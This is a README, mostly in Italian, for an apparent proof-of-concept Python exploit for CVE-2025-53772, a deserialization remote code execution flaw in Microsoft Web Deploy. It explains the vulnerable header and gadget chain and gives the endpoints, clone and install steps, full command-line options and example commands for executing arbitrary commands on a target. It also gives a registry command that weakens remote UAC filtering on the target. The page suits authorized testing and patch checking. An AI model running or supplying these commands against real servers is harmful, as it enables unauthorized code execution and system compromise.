
poc per cve-2025-53772
Un exploit basato su Python per CVE-2025-53772, una vulnerabilità di esecuzione remota di codice in Microsoft Web Deploy (msdeploy) causata dalla deserializzazione non sicura dei dati dell'header HTTP.

| Proprietà | Valore |
|---|
| ID CVE | CVE-2025-53772 |
| Punteggio CVSS | 8.8 (Alto) |
| Prodotto interessato | Microsoft Web Deploy 4.0 |
| Versioni vulnerabili | < 10.0.2001 |
| Versione patchata | 10.0.2001+ |
| Tipo di vulnerabilità | Deserializzazione di dati non attendibili (CWE-502) |
| Autenticazione | Richiesta (privilegi bassi) |
La vulnerabilità risiede nella deserializzazione dell'header HTTP MSDeploy.SyncOptions. Quando viene inviato un payload appositamente predisposto, il server lo deserializza tramite BinaryFormatter, innescando l'esecuzione di codice arbitrario attraverso la catena di gadget TypeConfuseDelegate.
Attacker Target Server
│ │
│ POST /MSDEPLOYAGENTSERVICE HTTP/1.1 │
│ MSDeploy.SyncOptions: <malicious_payload> │
│─────────────────────────────────────────────>│
│ │
│ BinaryFormatter.Deserialize()
│ │
│ ▼
│ Process.Start("cmd.exe", "/c ...")
│ │
│ ▼
│ RCE Achieved!
| Endpoint | Porta | Protocollo | Tipo di autenticazione |
|---|---|---|---|
/MSDEPLOYAGENTSERVICE | 80 | HTTP | NTLM |
/msdeploy.axd | 8172 | HTTPS | Basic |
git clone https://github.com/sailay1996/CVE-2025-53772.git
cd CVE-2025-53772
pip install -r requirements.txt
requests>=2.28.0
urllib3>=1.26.0
requests-ntlm>=1.2.0
# Create proof file in C:\Windows\Temp\pwned.txt
python3 CVE-2025-53772.py -t <TARGET_IP> -u "<DOMAIN\username>" -P "<password>" --ntlm --proof-temp
-t, --target Target IP or hostname (required)
-u, --user Username (required)
-P, --password Password (required)
--port Target port (default: 80)
--endpoint Endpoint path (default: /MSDEPLOYAGENTSERVICE)
--ntlm Use NTLM authentication (required for Agent Service)
--calc Execute calc.exe
--proof-temp Create C:\Windows\Temp\pwned.txt
--proof-web Create C:\inetpub\wwwroot\pwned.txt
-c, --command Custom command to execute
--generate-only Only generate payload, don't send
-o, --output Save payload to file
# Pop calculator
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\Administrator" -P "P@ssw0rd" --ntlm --calc
# Create proof file in temp folder
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\webdeploy" -P "Password123" --ntlm --proof-temp
# Create proof file in webroot (verify via browser)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm --proof-web
# Execute custom command
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm -c "whoami > C:\Windows\Temp\whoami.txt"
# Generate payload only (don't send)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "test" -P "test" --generate-only --proof-temp -o payload.txt
# Using msdeploy.axd endpoint (no --ntlm flag)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "webdeploy" -P "Password123" --port 8172 --endpoint "/msdeploy.axd" --proof-temp
Dopo aver eseguito l'exploit, verifica l'esecuzione sul target:
# Check for proof file
type C:\Windows\Temp\pwned.txt
# Or via browser (if --proof-web was used)
# Navigate to: http://<TARGET>/pwned.txt
Se utilizzi il servizio Agent con NTLM e ricevi un 401:
# On target, disable UAC remote filtering:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Il gestore IIS potrebbe non essere registrato. Usa invece l'endpoint di Agent Service:
--port 80 --endpoint "/MSDEPLOYAGENTSERVICE"
# Check installed version
(Get-Command msdeploy.exe).FileVersionInfo.FileVersion
# Vulnerable if < 10.0.2001
Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato ai sistemi informatici è illegale. Ottieni sempre la dovuta autorizzazione prima di eseguire i test.
Licenza MIT